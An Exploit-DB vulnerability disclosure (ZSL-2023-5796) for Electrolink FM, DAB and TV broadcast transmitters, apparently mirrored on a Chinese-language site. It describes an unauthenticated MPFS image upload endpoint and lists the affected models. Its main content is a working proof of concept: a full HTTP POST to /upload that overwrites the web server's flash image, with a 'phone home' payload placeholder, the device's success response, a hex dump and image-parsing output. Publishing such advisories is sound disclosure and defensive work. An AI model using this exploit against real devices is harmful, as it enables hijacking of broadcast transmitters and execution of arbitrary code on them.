Electrolink FM/DAB/TV Transmitter – Pre-Auth MPFS Image Remote Code Execution

• Exploit Database
• 38 阅读

• 作者： LiquidWorm
  日期： 2024-02-02
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51775/

• Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution
  
  
  Vendor: Electrolink s.r.l.
  Product web page: https://www.electrolink.com
  Affected version: 10W, 100W, 250W, Compact DAB Transmitter
  500W, 1kW, 2kW Medium DAB Transmitter
  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
  100W, 500W, 1kW, 2kW Compact FM Transmitter
  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
  15W - 40kW Digital FM Transmitter
  BI, BIII VHF TV Transmitter
  10W - 5kW UHF TV Transmitter
  Web version: 01.09, 01.08, 01.07
  Display version: 1.4, 1.2
  Control unit version: 01.06, 01.04, 01.03
  Firmware version: 2.1
  
  Summary: Since 1990 Electrolink has been dealing with design and
  manufacturing of advanced technologies for radio and television
  broadcasting. The most comprehensive products range includes: FM
  Transmitters, DAB Transmitters, TV Transmitters for analogue and
  digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
  DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
  switches, Manual patch panels, RF power meters, Rigid line and
  accessories. A professional solution that meets broadcasters needs
  from small community television or radio to big government networks.
  
  Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
  touch-screen display and in-built state of the art DAB modulator,
  EDI input and GPS receiver. All transmitters are equipped with a
  state-of-the art DAB modulator with excellent performances,
  self-protected and self-controlled amplifiers ensure trouble-free
  non-stop operation.
  
  100W, 500W, 1kW and 2kW power range available on compact 2U and
  3U 19" frame. Built-in stereo coder, touch screen display and
  efficient low noise air cooling system. Available models: 3kW,
  5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
  with fully broadband solid state amplifiers and an efficient
  low-noise air cooling system.
  
  FM digital modulator with excellent specifications, built-in
  stereo and RDS coder. Digital deviation limiter together with
  ASI and SDI inputs are available. These transmitters are ready
  for ISOFREQUENCY networks.
  
  Available for VHF BI and VHF BIII operation with robust desing
  and user-friendly local and remote control. Multi-standard UHF
  TV transmitters from 10W up to 5kW with efficient low noise air
  cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
  and ISDB-Tb available.
  
  Desc: The device allows access to an unprotected endpoint that
  allows MPFS File System binary image upload without authentication.
  The MPFS2 file system module provides a light-weight read-only
  file system that can be stored in external EEPROM, external
  serial Flash, or internal Flash program memory. This file system
  serves as the basis for the HTTP2 web server module, but is also
  used by the SNMP module and is available to other applications
  that require basic read-only storage capabilities. This can be
  exploited to overwrite the flash program memory that holds the
  web server's main interfaces and execute arbitrary code.
  
  Tested on: Mbedthis-Appweb/12.5.0
   Mbedthis-Appweb/12.0.0
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  Macedonian Information Security Research & Development Laboratory
  Zero Science Lab - https://www.zeroscience.mk - @zeroscience
  
  
  Advisory ID: ZSL-2023-5796
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php
  
  Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html
  
  30.06.2023
  
  --
  
  
  POST /upload HTTP/1.1
  Host: 192.168.150.77:8888
  Content-Length: 251
  Cache-Control: max-age=0
  Content-Type: multipart/form-data; boundary=----joxypoxy
  User-Agent: MPFS2_PoC/1.0c
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: Login=IgnoreMePlsKtnx
  Connection: close
  
  ------joxypoxy
  Content-Disposition: form-data; name="i"; filename="MPFSimg.bin"
  Content-Type: application/octet-stream
  
  MPFS...<CGI BINARY PHONE HOME>
  -----joxypoxy--
  
  
  HTTP/1.1 200 OK
  Connection: close
  Content-Type: text/html
  
  <html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="https://www.exploit-db.com/">Site main page</a></body></html>
  
  
  ---
  
  hd htm:
  0d 0a 4d 50 46 53 02 0101 00 8a 43 20 00 00 00MPFS.......C....
  2b 00 00 00 30 00 00 0002 44 eb 64 00 00 00 00+...0....D.d....
  00 00 69 6e 64 65 78 322e 68 74 6d 00 3c 68 74..index0.htm.<ht
  6d 6c 3e 0d 0a 3c 74 6974 6c 65 3e 5a 53 4c 3cml>..<title>ZSL<
  ...
  ...
  64 6f 73 21 0d 0a 3c 2f68 74 6d 6c 3e 0d 0a 2ddos!..</html>..-
  
  ---
  
  MPFS Structure:
   [M][P][F][S]
   [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files]
   [Name Hash 0][Name Hash 1]...[Name Hash N]
   [File Record 0][File Record 1]...[File Record N]
   [String 0][String 1]...[String N]
   [File Data 0][File Data 1]...[File Data N]
  
  
  ---
  
  C:\>javaw -jar MPFS2.jar
  C:\>mpfs2 -v -l MPFSimg.bin
  Version: 2.1
  Number of files: 1 (1 regular, 0 index)
  Number of dynamic variables: 0
  
  FileRecord 0:
  .StringPtr = 32 index0.htm
  .DataPtr = 43
  .Len = 48
  .Timestamp = 2023-08-27T14:39:30Z
  .Flags = 0